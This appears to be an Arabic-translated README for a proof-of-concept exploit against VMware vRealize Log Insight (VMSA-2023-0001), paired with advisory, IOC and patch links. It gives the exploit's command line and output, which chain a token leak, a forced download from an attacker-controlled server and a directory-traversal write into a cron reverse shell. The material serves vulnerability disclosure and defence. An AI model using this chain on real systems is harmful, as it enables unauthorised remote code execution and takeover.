
POC لـ RCE باستخدام الثغرات الموضحة في VMSA-2023-0001
إثبات المفهوم (POC) لـ VMSA-2023-0001 الذي يؤثر على VMware vRealize Log Insight ويتضمن الثغرات الأمنية (CVEs) التالية:
التكوين الافتراضي لهذه الثغرة يكتب مهمة cron لإنشاء قشرة عكسية (reverse shell). تأكد من تعديل ملف payload ليتناسب مع بيئتك.
يمكن العثور على تحليل فني لجذر الثغرة على مدونتنا: https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive
لتحليل مثيلات Log Insight بحثًا عن مؤشرات الاختراق، راجع مدونة IOC الخاصة بنا: https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/
يستغل إثبات المفهوم (POC) هذا نقاط نهاية Thrift RPC المختلفة لتحقيق كتابة ملفات عشوائية.
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
إذا كنت تستخدم حمولة (payload) تعتمد على cron، فتأكد من أن ملف الحمولة يمتلك الصلاحيات والمالك المناسبين:
sudo chown root:root payload
sudo chmod 0644 payload
قم بالتحديث إلى أحدث إصدار أو خفّف الأثر باتباع التعليمات الواردة في VMSA https://www.vmware.com/security/advisories/VMSA-2023-0001.html
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا بإذن صريح. القائمون على المشروع غير مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.